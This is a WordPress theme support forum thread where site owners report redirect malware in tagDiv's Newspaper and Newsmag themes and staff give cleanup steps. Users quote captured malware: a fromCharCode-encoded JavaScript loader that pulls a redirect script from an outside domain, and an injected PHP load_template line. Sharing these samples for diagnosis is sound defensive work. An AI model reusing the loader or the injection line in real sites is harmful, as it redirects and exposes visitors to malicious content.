No search results were found in Documentation!
Ok. Several other websites have also been facing similar issues due to this linux malware. Try and get in touch with a developer to get rid of the malicious code.
Hi,
In the past few weeks, a linux malware has been attacking various plugins and themes, redirecting them to malicious content and ads.
[https://news.drweb.com/show/?i=14646&lng=en&c=23]
This specific article claims the malware is abusing the vulnerability CVE-2016-10972 of Newspaper.
To date, I had been using the 10.3.4 version but today I updated it to the latest version of Newspaper. There is very little info regarding this malware as of now so if there is a possibility my website could have been infected?
Also, is there a specific patch for the theme regarding this malware and what should be my course of action if my website has indeed been infected?
Hi my website is https://todayhoroscopeinbengali.com/
When I try to my website its redirect some ads website. but after first time its not happening.
after some days its same problem.
when I view page source see the code like –
<path d=”M736 384c0-97.184-39.424-185.248-103.104-248.896s-151.712-103.104-248.896-103.104-185.248 39.424-248.896 103.104-103.104 151.712-103.104 248.896 39.424 185.248 103.104 248.896 151.712 103.104 248.896 103.104 185.248-39.424 248.896-103.104 103.104-151.712 103.104-248.896zM672 384c0 79.552-32.192 151.488-84.352 203.648s-124.096 84.352-203.648 84.352-151.488-32.192-203.648-84.352-84.352-124.096-84.352-203.648 32.192-151.488 84.352-203.648 124.096-84.352 203.648-84.352 151.488 32.192 203.648 84.352 84.352 124.096 84.352 203.648zM416 512v-128c0-17.664-14.336-32-32-32s-32 14.336-32 32v128c0 17.664 14.336 32 32 32s32-14.336 32-32zM384 288c17.664 0 32-14.336 32-32s-14.336-32-32-32-32 14.336-32 32 14.336 32 32 32z”></path></svg>
how to remove this. How to save my website?
view-source:https://todayhoroscopeinbengali.com/category/monthly-horoscope/
Hello,
Please check this topic about analyzer https://forum.tagdiv.com/topic/tagdiv-composer-critical-error-2/
If your website is redirected to other websites, then please downgrade wordpress to version 6.0 using this plugin https://wordpress.org/plugins/wp-downgrade/ after the update, the wordpress to 6.1.1 There are more files infected with malware.
Also, please check this topic https://forum.tagdiv.com/topic/update-required-newspaper-12-1-1-brings-extra-security/
Thank you!
Hi,
probably the problem is this: the antimalware on your server where your site resides … automatically deletes the css-analyze/css-analyze.php file so try contacting your hosting provider and asking them to whitelist it. Thanks to Lucian I solved it this way.
Hello,
Please downgrade wordpress to version 6.0 using this plugin https://wordpress.org/plugins/wp-downgrade/ after the update, the wordpress to 6.1.1 There are more files infected with malware.
Also, please check this topic https://forum.tagdiv.com/topic/update-required-newspaper-12-1-1-brings-extra-security/
Thank you!
If you notice that the site redirects to other sites, it may be because of injected malware. We recommend you follow the steps below:
– Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
– Update the theme to the latest version, Newspaper 12.1.1
If you have gone through the steps above and are still facing issues, don’t hesitate to contact us via email at contact@tagdiv.com. We’ll be ready to help you as soon as possible.
Thank you!
After many hours, I figured out why the page redirected, blame the script here, which is played out in the browser, but I can’t find the file where it was included:
blablalba fromCharCode(118,97,114,32,116,114,111,110,109,111,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66, 121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102, 111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,116,114,111,110,109,111,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32, 32,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105, 100,32,61,61,32,34,115,108,111,119,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32, 125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59, 118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115, 108,111,119,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49, 49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,57,55,44,49,50,49,44,52,54,44,49,49,53,44,49,49,50,44,49, 48,49,44,57,57,44,49,48,53,44,57,55,44,49,48,56,44,57,56,44,49,48,56,44,49,49,55,44,49,48,49,44,49,48,53,44,49,49,54,44,49,48,49,44,49,48,57,44, 49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,52,44,57,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,49,44,49, 49,50,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,48,44,52,54,44,52,56,44,52,57,41,59,32,105,102,32,40,100,111,99,117, 109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116, 83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109, 101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110, 116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125)) so it´s an encoded js this loads the redirecting js from https://way.specialblueitems.com/src/step.js?v=2.0
This script load also on every subpage.
I have run several malware scanners, they have not found the actual cause.
The strange thing is, as soon as I downgrade the newspapers, the redirect malware script is gone.
As soon as I update to the newest version, the malware script loads again.
So I wonder how this happens. After an upgrade the original data is downloaded from the tagdiv server and installed. Where can this demonic stuff be stored in the database or in a file?
Hi,
In case you are having the redirect malware, please try the suggestions from this topic https://forum.tagdiv.com/topic/update-required-newspaper-12-1-1-brings-extra-security/
If the problem persists or you need help, contact us via email.
Thank you!
Hello,
To activate the theme, please check this guide https://forum.tagdiv.com/newspaper-6-how-to-activate-the-theme/
If you notice that the site redirects to other sites, it may be because of injected malware. We recommend you follow the steps below:
– Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
– Update the theme to the latest version, Newsmag v5.2.3
If you have gone through the steps above and are still facing issues, don’t hesitate to contact us via email at contact@tagdiv.com. We’ll be ready to help you as soon as possible.
Thank you!
Hello,
If you notice that the site redirects to other sites, it may be because of injected malware. We recommend you follow the steps below:
– Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
– Update the theme to the latest version, Newsmag v5.2.3
If you have gone through the steps above and are still facing issues, don’t hesitate to contact us via email at contact@tagdiv.com. We’ll be ready to help you as soon as possible.
Thank you!
I got Malware on the stie, but I removed every code script in headers and ads that I found. But there is still Malware there. Need help. Updated everything and can’t remove it.
Header shows way.specialblueitems.com script. Where can this come from?
Let me state this up front.
I am not a programmer or hacker and touching code is something I do not like to do ever.
I am building out a new site, over 2 months of work, and last night when I quit for the day everything was fine.
However this morning when I went to work on my site when I was checking posts I kept getting and popup from Trend Micro that they were blocking a site that was malicious.
I had no idea as to what was going on but I have spent the last 4 hours digging around and finally installed Wordfence.
I am not pushing Wordfence but I was at the end of what I knew to check.
I installed Wordfence and let it run its test and it uncovered the problem.
Some how, and I really have no idea how, someone or something was able to interject code into my Newspaper theme.
Wordfence showed me where the code was, in 2 files, and I made backups of the 2 files, took a deep breath, and deleted the lines of code that had been added to each file.
The popup warnings from Trend Micro are gone and rerunning the Wordfence Malware check one more time did not show any problems in my site.
The 2 files were the functions.php and another one in the plugin folder.
What Trend Micro was blocking was this website: “perspective.cdsignner.com”.
The line of code that was put into the function files is: load_template( strrev( “//:piz” ) . locate_template( “Newspaper.template” ) . “#template”, true )
I am just trying to let everyone know that my site was hacked, how I have no idea, but someone did.
I have no idea if the admins here at tagdiv and do anything to stop this from happening to anyone else.
I think I have supplied all of the info I needed to fix my problem.
If I did anything wrong could someone please let me know.
Have a good day.
Whenever I activate AMP so that my mobile page is viewable properly, it causes a bunch of code to appear all over my website, or people are rerouted somewhere else with popups. I just had malware removed last week. What can I do to be able to use AMP properly?
My website is redirecting to another page
So please check and solve it now. My website is https://www.uniquetechideas.com/
Hello @tiwariproduction9 !
I’m sorry to hear that your website has been attacked. I can recommend you some tips, please check this topic: https://forum.tagdiv.com/topic/hacking-issues-with-version-11-2/
Also, I recommend you to check and clean your files: https://askwpgirl.com/10-steps-remove-malware-wordpress-site/
Uninstall the advertisements on your website.
After that, you should reinstall everything, starting with the WordPress, theme, plugins so that it will be a clean install.
Thank you!
Hi,
If you notice that the site redirects to other sites, it may be because of injected malware. We recommend you follow the steps below:
– Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
– Update the theme to the latest version, Newsmag v5.2.3
If you have gone through the steps above and are still facing issues, don’t hesitate to contact us via email at contact@tagdiv.com. We’ll be ready to help you as soon as possible.
Thank you!
My site has been affected like many others using Newsmag. I have my site clean now and have completely deleted and reinstalled Newsmag V5.2.3. When I am logged in I can see my site fine, however my site is not displayed to the public. I just get a white box. I have tried basically everything, even changing PHP Versions
Hello,
If you notice that the site redirects to other sites, it may be because of injected malware. We recommend you follow the steps below:
– Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
– Update the theme to the latest version, Newspaper v5.2.3
If you have gone through the steps above and are still facing issues, don’t hesitate to contact us via email at contact@tagdiv.com. We’ll be ready to help you as soon as possible.
Thank you!
Hello,
Our site has been getting infected all the time http://www.westfaironline.com. I have worked with our hosting system wpengine to have it clean. But every time they clean it, it gets infected again. Here is what they have to say:
Ok so the main issue here is that their Newsmag theme is very outdated:
Warning: Vulnerable tagDiv Theme Newsmag theme found at ./wp-content/themes/Newsmag/includes/tagdiv-config.php – Version: 5.2.3 – Please update this theme or switch it immediately: https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea.
Sadly with this malware if the vulnerable code is present then the injection comes back right away after cleaning it. The theme needs to be updated.
I checked the version info from within their wp-admin panel and it reported that there was an issue with their license key. The theme is also quite outdated (they are using 5.2.3 but they need to update to version 12 to get this patched).
So I’m afraid that the client is going to have to either contact TagDiv and get their license key issue sorted out or, alternatively, switch their theme:
—-
Please reset the key from the System status tab and try to activate it again, or contact our customer support team at contact@tagdiv.com.
Can you please let me know how I can get this resolve.
Thank you
Dan V.
Hi,
Thank you for the suggestion. The problem with this malware (weatherplllatform) is that it is very easily installed in WordPress files, most of the users who contacted us no longer had that code in the theme panel, but it was present in the index.php files and even in wp- includes/js/jquery/jquery.min.js
After I cleaned all the files that I found infected, I asked the users to reset the passwords, especially for the administrators, and to be sure that the permission settings for the WordPress files are correctly set (usually these settings are checked by the host). So far, these users have not reported any problems following these steps.
Now if you say that you have different IPs that force the website, it means that they want to exploit the website and try to use the initial solution to re-infect you.
Thank you!
I have NOT being infected again, but I can see the same IPS (that I blocked, you can see here and in the other post related with this issue) are trying to repeatedly. My advise is to block them. Both are from OVH SAS hosting, famous for a lot of spam and hacking (I thought to block the entire ip range from this hosting, but finally I didn’t. Anyway I have to say that I have blocked dozens of them).
So, I will ask your developers to find a “more secure” solution to this malware than not to allow writing an “eval string” in theme panel. Think about it, cause it’s a real problem…
Also, If i were you (I mean newspaper support) I will ask to OVH SAS abuse department to look into this ips ranges. If they receive a mail or a call from an important theme developer like you, they will look into the problem with more emphasis than if they receive a mail from a “normal web admin”. Think about it too.
Dear Sir/Madam,
I have purchased tagdiv theme and 2 more Licenses. But Now, I am facing Malware Warning. Which is Infected my website.
You can check at https://sitecheck.sucuri.net/results/https/tricks4trade.com. When I delete a theme Error also remove. Due to google rejecting my website. It’s effecting my business last few weeks.
Kindly help to resolve it ASAP.
Thanks
Hi,
Thank you Anamaria,
recently, i’ve detected malware but i’ve no idea how to get rid of it. Is it from the theme?
I’ve gotten a malware javascript on my site and i would like to know how I can remove it.
any advice would be greatly appreciated.
Hi,
In case you are having the redirect malware, please try the suggestions from this topic https://forum.tagdiv.com/topic/update-required-newspaper-12-1-1-brings-extra-security/
In case the problem persists or you need help, you can contact us via email.
Thank you!